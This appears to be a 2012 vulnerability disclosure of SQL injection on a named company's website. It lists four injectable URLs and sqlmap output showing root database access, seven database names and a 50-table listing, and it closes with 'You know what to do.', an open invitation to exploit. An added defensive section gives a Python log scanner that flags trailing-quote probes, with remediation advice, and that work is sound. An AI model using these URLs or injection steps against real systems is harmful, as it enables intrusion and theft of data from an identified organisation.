2012-11-08: Details reported to the vendor; awaiting vendor handling
2012-11-13: The vendor chose to ignore the vulnerability; details disclosed to the public
There really are quite a few injection vulnerabilities~~
http://huiju.neusoft.com/AboutUs/NewsLook.php?id=21'
http://huiju.neusoft.com/xService/Index.php?id=7'
http://huiju.neusoft.com/AboutUs/NewsListByType.php?tid=1'
http://huiju.neusoft.com/Other/ClientList.php?tid=1'
That's all for now; visiting any one of them produces an error message.
[11:09:23] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.9
back-end DBMS: MySQL 5.0
[11:09:23] [INFO] fetching current user
[11:09:23] [INFO] resumed: root@%
current user: 'root@%'
[11:09:23] [INFO] fetching current database
[11:09:23] [INFO] resumed: wit
current database: 'wit'
-------------------------------------------------------
[11:10:14] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.9
back-end DBMS: MySQL 5.0
[11:10:14] [INFO] fetching database names
[11:10:14] [INFO] the SQL query used returns 7 entries
[11:10:14] [INFO] starting 7 threads
[11:10:14] [INFO] resumed: information_schema
[11:10:14] [INFO] resumed: Copy of news
[11:10:14] [INFO] resumed: mysql
[11:10:14] [INFO] resumed: news
[11:10:14] [INFO] resumed: newsbak
[11:10:14] [INFO] resumed: test
[11:10:14] [INFO] resumed: wit
available databases [7]:
[*] Copy of news
[*] information_schema
[*] mysql
[*] news
[*] newsbak
[*] test
[*] wit
--------------------------------------------------
[11:10:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.9
back-end DBMS: MySQL 5.0
[11:10:44] [INFO] fetching tables for database: 'wit'
[11:10:45] [INFO] the SQL query used returns 50 entries
[11:10:45] [INFO] starting 10 threads
Database: wit
[50 tables]
+--------------------+
| abstruct           |
| activitypic        |
| admin              |
| apply              |
| applylist          |
| applyoklist        |
| clientcase         |
| clientcaselist     |
| clientcasetype     |
| defaultpic         |
| erpservicecase     |
| erpservicecaselist |
| erpservicedoc      |
| erpservicedoclist  |
| erpserviceeoc      |
| erpservicetype     |
| jbosok             |
| jobs               |
| links              |
| linkus             |
| message            |
| nether             |
| news               |
| newslist           |
| newstype           |
| noticedoc          |
| noticelist         |
| omservicecase      |
| omservicecaselist  |
| omservicedoc       |
| omservicedoclist   |
| omservicetype      |
| position           |
| positionlist       |
| positiontype       |
| pxinfolist         |
| pxnews             |
| pxnewstype         |
| register           |
| sendemail          |
| temp_tab           |
| uniontype          |
| xservicecase       |
| xservicecaselist   |
| xservicedoc        |
| xservicedoclist    |
| xservicetype       |
| zlinfolist         |
| zlnews             |
| zlnewstype         |
+--------------------+
You know what to do.
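For defenders reviewing their own logs, the following added example (not part of the original report) flags requests in which the numeric `id` / `tid` parameters seen in the URLs above carry anything other than digits, such as a trailing quote. It assumes a Common Log Format access log and that both parameters are meant to be integers; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: these parameters are integer record selectors (as in the report's URLs).
NUMERIC_PARAMS = {"id", "tid"}

# Assumption: Common Log Format request field, "METHOD target HTTP/x.y".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return (name, value) pairs where a numeric parameter is not all ASCII digits."""
    query = urlsplit(target).query
    hits = []
    # parse_qsl percent-decodes, so %27 and a literal ' are treated alike.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in NUMERIC_PARAMS and not (value.isascii() and value.isdigit()):
            hits.append((name, value))
    return hits


def scan(log_lines):
    """Yield (client_ip, path, name, value) for each malformed numeric parameter."""
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line we understand
        target = match.group("target")
        client_ip = line.split(" ", 1)[0]
        for name, value in suspicious_params(target):
            yield client_ip, urlsplit(target).path, name, value


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [08/Nov/2012:11:09:20 +0800] "GET /AboutUs/NewsLook.php?id=21 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [08/Nov/2012:11:09:21 +0800] "GET /AboutUs/NewsLook.php?id=21\' HTTP/1.1" 200 812',
    '203.0.113.9 - - [08/Nov/2012:11:09:22 +0800] "GET /Other/ClientList.php?tid=1%27 HTTP/1.1" 200 790',
    '198.51.100.7 - - [08/Nov/2012:11:09:25 +0800] "GET /xService/Index.php?id=7 HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for ip, path, name, value in scan(SAMPLE_LOG):
        print(f"{ip} {path} {name}={value!r}")
```

The same digits-only check, applied in the application before the value reaches the query (together with parameterized statements and a database account other than root), closes the hole rather than only detecting probes.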
Severity: No impact (ignored by vendor)
Ignored at: 2012-11-13 14:35
None yet